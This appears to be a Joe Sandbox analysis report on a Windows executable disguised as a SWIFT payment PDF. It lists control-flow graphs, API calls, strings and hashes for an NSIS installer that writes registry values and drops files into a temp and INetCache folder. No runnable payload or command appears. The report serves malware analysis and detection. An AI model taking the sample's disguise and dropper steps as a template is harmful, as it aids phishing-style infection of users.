                                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 459 402eab-402eb2 451->459 460 402fcd-402fd5 call 402d8a 451->460 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 479 402f92-402f98 455->479 456->453 484 402fd7-402fe8 456->484 464 402eb4-402ec8 call 405be5 459->464 465 402f2e-402f32 459->465 460->453 470 402f3c-402f42 464->470 482 402eca-402ed1 464->482 469 402f34-402f3b call 402d8a 465->469 465->470 469->470 475 402f51-402f5b 470->475 476 402f44-402f4e call 4064dc 470->476 475->448 483 402f61 475->483 476->475 479->453 479->456 482->470 488 402ed3-402eda 482->488 483->445 485 402ff0-402ff5 484->485 486 402fea 484->486 489 402ff6-402ffc 485->489 486->485 488->470 490 402edc-402ee3 488->490 489->489 491 402ffe-403019 SetFilePointer call 405be5 489->491 490->470 492 402ee5-402eec 490->492 496 40301e 491->496 492->470 493 402eee-402f0e 492->493 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->470 499 402f2a-402f2c 497->499 498->483 498->497 499->470
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFT091816-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 4283519449-205756598
                                                                                                                                • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 837 4017ad-4017ae call 4062e9 831->837 832->837 841 4017b3-4017b7 837->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 851 4017d5-4017e7 842->851 852 4017c5-4017d3 CompareFileTime 842->852 844 4017f5-401811 call 405c2a 843->844 845 4017ef-4017f0 call 405c05 843->845 853 401813-401816 844->853 854 401885-4018ae call 4051b4 call 403027 844->854 845->844 851->843 852->851 855 401867-401871 call 4051b4 853->855 856 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->856 866 4018b0-4018b4 854->866 867 4018b6-4018c2 SetFileTime 854->867 868 40187a-401880 855->868 856->841 888 40185c-40185d 856->888 866->867 870 4018c8-4018d3 CloseHandle 866->870 867->870 871 402a55 868->871 873 4018d9-4018dc 870->873 874 402a4c-402a4f 870->874 875 402a57-402a5b 871->875 877 4018f1-4018f4 call 406077 873->877 878 4018de-4018ef call 406077 lstrcatW 873->878 874->871 885 4018f9-40228d call 40579a 877->885 878->885 885->875 888->868 890 40185f-401860 888->890 890->855
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsq69D9.tmp$C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll$Call
                                                                                                                                • API String ID: 1941528284-441910825
                                                                                                                                • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 907 40323b-40323f 904->907 910 40321d-403220 905->910 911 4031df-4031e2 905->911 908 403238 906->908 909 4030da-4030e2 906->909 908->907 913 4030e4 909->913 914 4030e7-4030f5 call 403242 909->914 915 403222 910->915 916 403225-40322e call 403242 910->916 911->908 912 4031e4 911->912 917 4031e7-4031ed 912->917 913->914 914->902 926 4030fb-403104 914->926 915->916 916->902 924 403235 916->924 920 4031f1-4031ff call 403242 917->920 921 4031ef 917->921 920->902 929 403201-40320d call 405cdc 920->929 921->920 924->908 928 40310a-40312a call 40654a 926->928 934 403130-403143 GetTickCount 928->934 935 4031d3-4031d5 928->935 936 4031d7-4031d9 929->936 937 40320f-403219 929->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->917 942 40321b 937->942 943 403155-40318b MulDiv wsprintfW call 4051b4 938->943 944 40314f-403153 938->944 940 403192-403196 939->940 941 4031c7-4031cb 939->941 945 403198-40319f call 405cdc 940->945 946 4031ad-4031b8 940->946 941->909 947 4031d1 941->947 942->908 943->939 944->939 944->943 952 4031a4-4031a6 945->952 951 4031bb-4031bf 946->951 947->908 951->928 953 4031c5 951->953 952->936 954 4031a8-4031ab 952->954 953->908 954->951
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                                • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 961 402609 958->961 962 40260c-40260f 958->962 960 402a55-402a5b 959->960 961->962 964 402773-40277b 962->964 965 402615-402624 call 405fb5 962->965 964->959 965->964 968 40262a 965->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 973 4026e4-4026f4 call 405cad 970->973 974 4026ce-4026d1 970->974 971->964 972 40265b-402660 971->972 972->964 976 402666-402674 972->976 973->964 982 4026f6 973->982 974->973 977 4026d3-4026de call 405d0b 974->977 979 40267a-40268c MultiByteToWideChar 976->979 980 40272f-40273b call 405f9c 976->980 977->964 977->973 979->982 983 40268e-402691 979->983 980->960 986 4026f9-4026fc 982->986 987 402693-40269e 983->987 986->980 989 4026fe-402703 986->989 987->986 990 4026a0-4026c5 SetFilePointer MultiByteToWideChar 987->990 991 402740-402744 989->991 992 402705-40270a 989->992 990->987 993 4026c7 990->993 995 402761-40276d SetFilePointer 991->995 996 402746-40274a 991->996 992->991 994 40270c-40271f 992->994 993->982 994->964 997 402721-402727 994->997 995->964 998 402752-40275f 996->998 999 40274c-402750 996->999 997->969 1000 40272d 997->1000 998->964 999->995 999->998 1000->964
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1010 4023d1-4023de call 402bbf lstrlenW 1008->1010 1011 4023e2-4023e5 1008->1011 1010->1011 1015 4023f5-4023f8 1011->1015 1016 4023e7-4023f4 call 402ba2 1011->1016 1019 402409-40241d RegSetValueExW 1015->1019 1020 4023fa-402404 call 403027 1015->1020 1016->1015 1022 402422-4024fc RegCloseKey 1019->1022 1023 40241f 1019->1023 1020->1019 1022->1009 1026 40281e-402825 1022->1026 1023->1022 1026->1009
                                                                                                                                APIs
                                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq69D9.tmp
                                                                                                                                • API String ID: 1356686001-4180625566
                                                                                                                                • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 3449924974-3081826266
                                                                                                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1033 10001759-10001795 call 10001b18 1037 100018a6-100018a8 1033->1037 1038 1000179b-1000179f 1033->1038 1039 100017a1-100017a7 call 10002286 1038->1039 1040 100017a8-100017b5 call 100022d0 1038->1040 1039->1040 1045 100017e5-100017ec 1040->1045 1046 100017b7-100017bc 1040->1046 1047 1000180c-10001810 1045->1047 1048 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 1045->1048 1049 100017d7-100017da 1046->1049 1050 100017be-100017bf 1046->1050 1055 10001812-1000184c call 100015b4 call 100024a9 1047->1055 1056 1000184e-10001854 call 100024a9 1047->1056 1072 10001855-10001859 1048->1072 1049->1045 1051 100017dc-100017dd call 10002b5f 1049->1051 1053 100017c1-100017c2 1050->1053 1054 100017c7-100017c8 call 100028a4 1050->1054 1065 100017e2 1051->1065 1060 100017c4-100017c5 1053->1060 1061 100017cf-100017d5 call 10002645 1053->1061 1068 100017cd 1054->1068 1055->1072 1056->1072 1060->1045 1060->1054 1071 100017e4 1061->1071 1065->1071 1068->1065 1071->1045 1076 10001896-1000189d 1072->1076 1077 1000185b-10001869 call 1000246c 1072->1077 1076->1037 1079 1000189f-100018a0 GlobalFree 1076->1079 1083 10001881-10001888 1077->1083 1084 1000186b-1000186e 1077->1084 1079->1037 1083->1076 1086 1000188a-10001895 call 1000153d 1083->1086 1084->1083 1085 10001870-10001878 1084->1085 1085->1083 1087 1000187a-1000187b FreeLibrary 1085->1087 1086->1076 1087->1083
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
